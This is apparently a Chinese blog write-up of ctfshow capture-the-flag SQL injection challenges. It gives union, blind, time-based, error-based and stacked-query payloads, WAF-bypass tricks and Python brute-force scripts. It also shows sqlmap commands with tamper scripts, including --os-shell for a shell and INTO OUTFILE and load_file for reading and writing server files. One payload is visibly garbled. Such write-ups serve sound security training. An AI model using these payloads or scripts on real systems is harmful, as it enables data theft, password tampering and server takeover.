ctfshow靶场sql注入wp

最新推荐文章于 2024-06-29 14:56:42 发布
最新推荐文章于 2024-06-29 14:56:42 发布
阅读量782 收藏 32
点赞数 11
文章标签: sql 数据库 笔记 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/137150778
版权

目录

web171

web172

web173

web174

web175

web176

web177-179

web180-183

web184

web185

web187

web190

web191

web192

web193

web194

web195

web196

web197

web199

web201

web202

web203

web204

web205

web206

web207

web208

web209

web210

web211

web212

web213

web225

web245

web171

获取库名:1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23

获取表名:1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

获取字段名:1'union select 1,group_concat(password,username),3 from ctfshow_user%23

web172

这里可以使用database64加密。

1'union select 1,to_base64(password) from ctfshow_user where username="flag"%23

web173
 

使用16进制进行转换

1' union select 1,hex(password),3 from ctfshow_user3 where username='flag'%23

web174

进行写文件

1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit

打开1.txt获取flag

web175

这里可以使用脚本跑

import requests
def get_pwd_len(url):
    head = 1
    tail = 100
    ans = 0
    while head < tail:
        mid = (head + tail ) >> 1
        payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"
        # print(uname)
        param = {
            'id': payload,
            'page': '1',
            'limit': '10'
        }
        res = requests.get(url=url,params=param)
        try:
            r = requests.get(url,params=param,timeout=0.5)
            tail = mid
            ans = mid
        except Exception as e :
            head = mid +1
    print(ans)

        # passwd长度为:45
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)


def get_pwd(url):
    ans = ""
    for i in range(1, 46):
        # print(i)
        j = 46 - i
        # print(j)
        head = 32
        tail = 127
        while head <tail:
            mid = (head + tail) >> 1 #>>是位移运算符 右移一位就是除以二
            payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"
            # print(uname)
            param = {
                'id': payload,
                'page': '1',
                'limit': '10'
            }
            try:
                res = requests.get(url=url,params=param,timeout=0.5)
                tail = mid
            except Exception as e:
                head = mid + 1

        if head != 32:
            ans += chr(head)
        else:
            break
        print(ans)
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)

无空格和逗号

web176

使用大小写绕过

-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23

web177-179

使用括号绕过:-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23

使用注释绕过:-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23

反引号绕过:-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23

web180-183

过滤了注释符:

-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1

web184

过滤了很多,这里使用脚本测试

使用脚本

import requests

url="http://6ca99d4f-ef75-4808-92e8-5fc1a7b9548e.challenge.ctf.show/select-waf.php"
flag="ctfshow{"

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x','') for c in s])
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
#'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))
            'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 1" in r:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

这里使用了like模糊查询。

web185

数字的表示,使用脚本

import requests

url = "http://47b18d10-5722-4603-961a-2ef4d5b872d8.challenge.ctf.show/select-waf.php"

flag = 'ctfshow{'


def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num


for i in range(45):
    if i <= 8:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)

                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

web187

loadfile盲注


import requests

url="http://17e6ad41-8c34-4fb3-aa23-f9fbfc11d012.challenge.ctf.show/api/index.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web190

无过滤的盲注

import requests

url = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库 ctfshow_fl0g
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段 id,f1ag
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }

        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web191

ord函数盲注

 Author:Y4tacker
import requests

url = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库 ctfshow_fl0g
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段 f1ag
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }

        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web192

过滤ord和ascll函数

import requests
import string

url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web193

过滤sustr

 Author:feng
import requests

url='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        #payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        #payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")

        data={
            'username':payload,
            'password':1
        }
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(payload)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web194

locate()正则注入

 Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
    for j in stttr:
        final += j
        # 查表名-ctfshow_flxg
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # 查字段-f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            final = final[:-1]

web195

堆叠注入,这里使用16进制

前面的是admin,后面的是111,就是将所有用户的密码修改为111,之后登陆即可。

使用16进制原因:$sql = "select pass from ctfshow_user where username = {$username};";(没有字符串单引号包围)

0x61646d696e;update`ctfshow_user`set`pass`=0x313131;

web196

payload:1;select(1)

web197

利用alter改名:1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)


import requests

url = "http://5f5edc35-cd47-49e5-9252-5a3301edd9f3.challenge.ctf.show/api/"
for i in range(100):
    if i == 0:
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break


#登陆成功 flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}

web199

payload:

1;show tables

ctfshow_user

show tables;会显示表名,也就是ctfshow_user那么这个时候会将查出来的这个值当成密码,也就是密码为ctfshow_user

sqlmap注入

web201

referer绕过

//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --T ctfshow_user --dump --batch

web202

data绕过:

//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --T ctfshow_user --dump --batch

web203

请求方式绕过(必须加index.php)

//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain"--batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --T ctfshow_user --dump --batch

web204

包含cookie

>python sqlmap.py -u http://41ecd4df-c94a-4612-af16-2b0b6c834e9e.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=5gqkmm2fh7l226lf4s9q4nl444; ctfshow=885b1983b7f7963b7d736fd8b93c185f" -D ctfshow_web -T ctfshow_user --dump --batch

web205

访问安全连接

它先访问的getToken,

--safe-url 设置在测试目标地址前访问的安全链接
 --safe-freq 设置两次注入测试前访问安全链接的次数

python sqlmap.py -u http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump --batch

web206

符号闭合

python sqlmap.py -u http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --prefix="')" --suffix="#"-T ctfshow_flax --dump --batch

--prefix:前置闭合

--suffix:后置闭合

web207

--temper自己的脚本编写

python sqlmap.py -u http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

web208

大小写空格前后包含

python sqlmap.py -u "http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment(替换空格),randomcase(替换大小写)" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump

web209

过滤了星号等号和空格

编写脚本web209

python sqlmap.py -u http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D  ctfshow_web -T  ctfshow_flav -C ctfshow_flagx --dump

web210

对base64进行解密

python sqlmap.py -u http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavi -C ctfshow_flagxx --dump

web211

绕过翻转字符/

python sqlmap.py -u http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavia -C ctfshow_flagxxa --dump

web212

过滤单引号空格,继续使用210脚本

sqlmap>python sqlmap.py -u http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavis --dump

web213

使用os-shell一键getshell

python sqlmap.py -u http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump  --os-shell --batch

上传文件后进行命令执行操作。

web225

堆叠注入handler读取数据。

payload:

?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10

报错注入

web245

模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10
	
表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10

字段名
api/?id=1' and extractvalue(1,conccmn_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10

数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10			
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10

  

api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10

B10SS0MS
关注
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4446
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
全!CTF靶场、渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
CTF—SQL注入(get)
YkingH的博客
07-09 868
CTF—WEBSQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
sql注入靶场练习
akxnxbshai的博客
04-01 597
远古素材,图床炸了一次后就没交,今天没事就改一下。
靶场】ctfshow 详解web259原生类反序列化
最新发布
Yuppie001的博客
06-29 796
在编程中,假设你用 PHP 写了一个网站,需要从另外一个服务器获取一些信息(比如天气预报),而这个服务器使用的是一种叫做 SOAP 的协议。通过构造一个SOAP客户端,并调用了getFlag的远程SOAP服务方法,这个调用过程由PHP的__call魔术方法处理,负责发送SOAP请求并接收响应。当然,这道题也可以不用反序列化来做,直接访问bp进行抓包,添加对应的xff头和相应数据块即可获得flag。的原因,所以后面的部分全部被忽略,真实有效的数据包为黄色部分。黄色部分为构造的数据包,因为。
万字sql注入学习过程--------从一个查询语句到SQL注入原理——包含各种注入姿势及相关CTF,靶场,漏洞实战 随时补充内容
AAAAAAAAAAAA66的博客
11-30 2639
从第一次接触到SQL注入到现在已经有小半年了,简单打了个DVWA靶场之后便没怎么用手工注入,非常依赖工具,最近遇到几道需要手动注入的CTF题目,发现自己对sql注入的原理只是停留在一个基础的理论之上,所以就写这一篇文章对自己的sql注入进行新的梳理。 ——————————————————————————————————————————— 开始介绍sql注入漏洞之前,先介绍一个基础的mysql查询语句(学过数据库的同学直接跳走) 我们经常遇到一个这样的需要我们输入的表格 我们在这输入一个 1 .
WEB攻防-通用漏洞&PHP反序列化&POP链构造&魔术方法&原生类
ran的博客
04-09 1422
就是一种典型的数据传输方法,可以更好的保证代码的正确性和完整性。 在php里有时会存在一些魔术方法,可以控制优先执行什么或者初始化什么,但是如果魔术方法使用不当,就可能会造成反序列化漏洞。原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。
CTFshow 1-10关
weixin_62369433的博客
11-11 2244
CTFshow 1-10 通关详解
命令执行漏洞—CTFSHOW(简单利用)
weixin_44431280的博客
03-05 1415
命令执行漏洞—CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行(RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4692
ctfshow 靶场 web入门 sql注入系列
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7235
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
简单的sql注入之2WP
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
ctfshow- sql注入(web入门)
..
11-19 1881
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
简单的sql注入WP
Yale的博客
03-19 1091
这题比较简单,我们就直接手工注入了 这里给大家推荐一个火狐插件hackbar,在做web题的时候还是挺好用的 下面开始介绍手工的流程:1)输入1,提交,不报错 2)输入1‘,提交,报错,判断存在注入。 3)根据同类型题目的经验,初步预计后台表为flag,字段名为flag,需要构造union select flag from flag 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构
CTF-SQL注入
weixin_44770698的博客
06-16 5200
CTF-SQL注入题目整理
CTFSHOW-sql注入
Yb_140的博客
08-13 2521
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
CTF刷题-SQL注入
weixin_43882862的博客
08-08 3454
靶场第二题,SQL注入 题目 链接:http://59.63.200.79:8004/ 解题思路 打开这个链接,我们可以发现是一个新闻门户网站。 这时候试着点击一下新闻动态里面的一条新闻,因为新闻页面的功能往往和数据库有关系,同时发现点开的新闻界面链接是: http://59.63.200.79:8004/shownews.asp?id=171。本能告诉我,这个可能存在SQL注入漏洞。但是这个题目,使用SQL注入漏洞判别方式(输入单引号)提示有错误。使用order by 10又可以访问,说明数据库有10
CTFshow_web入门_sql注入wp
monster663的博客
02-22 1147
web171 150题,准备好了吗? 1' or 1=1--+ web172 无过滤直接注,这里演示一下比较完整的注入过程,#后面表示回显结果 1' or 1=1--+ 测试注入点 1' order by 2--+ 测试列数 1' union select 1,2--+ 回显 1' union select 1,(select group_concat(schema_name) from information_schema..
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lvx++的博客
01-22 3731
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
dvwa靶场sql注入
08-15
在DVWA靶场中,SQL注入是其中一个常见的漏洞。 SQL注入是一种利用现有应用程序的漏洞,将恶意的SQL命令插入到Web表单提交或输入的查询字符串中,从而欺骗服务器执行恶意的SQL命令。攻击者可以利用SQL注入来绕过应用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值